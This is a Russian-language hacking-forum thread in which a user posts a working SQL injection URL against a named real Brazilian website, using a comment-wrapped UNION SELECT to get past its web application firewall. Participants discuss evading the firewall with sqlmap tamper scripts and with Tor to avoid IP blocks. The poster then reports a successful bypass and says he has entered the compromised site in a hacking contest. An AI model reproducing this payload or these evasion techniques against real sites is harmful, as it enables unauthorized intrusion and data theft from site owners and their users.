 |
04.10.2015, 14:50
|
|
Познающий
Регистрация: 26.09.2015
Сообщений: 56
Провел на форуме:
11344
Репутация:
5
|
|
Сайт: endividado.com.br
Уязвимость: SQLi (с обходом WAF)
Эксплоит:
Код:
http://www.endividado.com.br/faq_det.php?id=10+/*!union*/+select+1,version%28%29,current_user,4,5,6,7+--+
Собственно вопрос - WAF блокирует запрос при появлении user(), database(). Как такое обходить? Пробовал играться с комментариями, строчные/прописные - все равно блок. Что еще можно попробовать? |
|
|
04.10.2015, 15:00
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
29
Репутация:
0
|
|
Waf заблокировал мой ip
|
|
|
|
04.10.2015, 15:21
|
|
Познающий
Регистрация: 26.09.2015
Сообщений: 56
Провел на форуме:
11344
Репутация:
5
|
|
Меня из под Тор'а не блочит.
Попробовал захексить user() - 0x007500730065007200280029, выводится просто текстом - user(), видимо я какую-то фигню сделал хД
|
|
|
|
04.10.2015, 15:23
|
|
Познавший АНТИЧАТ
Регистрация: 23.04.2012
Сообщений: 1,109
Провел на форуме:
216062
Репутация:
231
|
|
Сообщение от AlexG
↑
Меня из под Тор'а не блочит.
Попробовал захексить user() - 0x007500730065007200280029, выводится просто текстом - user(), видимо я какую-то фигню сделал хД
юзай --tamper в sqlmap сами файлы в папке tampers
|
|
|
|
04.10.2015, 15:32
|
|
Познающий
Регистрация: 26.09.2015
Сообщений: 56
Провел на форуме:
11344
Репутация:
5
|
|
Сообщение от grimnir
↑
юзай --tamper в sqlmap сами файлы в папке tampers
Я типа на конкурс новичков - ручками с выводом на страницу. Да и для получения навыков полезно ручками поработать. Тем более, как показала моя практика - тамперы не всегда помагают, надо писать свои - а если не понимаешь как работает WAF и не можешь обойти его руками (как например я) - то тампер не напишешь, надо восполнить пробел хД
|
|
|
|
04.10.2015, 15:36
|
|
Познавший АНТИЧАТ
Регистрация: 23.04.2012
Сообщений: 1,109
Провел на форуме:
216062
Репутация:
231
|
|
Сообщение от AlexG
↑
Я типа на конкурс новичков - ручками с выводом на страницу. Да и для получения навыков полезно ручками поработать. Тем более, как показала моя практика - тамперы не всегда помагают, надо писать свои - а если не понимаешь как работает WAF и не можешь обойти его руками (как например я) - то тампер не напишешь, надо восполнить пробел хД
Ну тогда можно тамперы позапускать и вот который сработает посмотреть исходник у него ,а дальше руками )
|
|
|
|
04.10.2015, 15:41
|
|
Познающий
Регистрация: 26.09.2015
Сообщений: 56
Провел на форуме:
11344
Репутация:
5
|
|
Сообщение от grimnir
↑
Ну тогда можно тамперы позапускать и вот который сработает посмотреть исходник у него ,а дальше руками )
Принято, спасибо. Но хочется "здесь и сейчас", а впн-ка пока закончилась. Может кто все таки пнет в направлении нужном.
|
|
|
|
04.10.2015, 16:37
|
|
Познающий
Регистрация: 26.09.2015
Сообщений: 56
Провел на форуме:
11344
Репутация:
5
|
|
Сообщение от AlexG
↑
Принято, спасибо. Но хочется "здесь и сейчас", а впн-ка пока закончилась. Может кто все таки пнет в направлении нужном.
UPD Все, обошел. Сайт закинул в конкурс.
Тема закрыта.
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
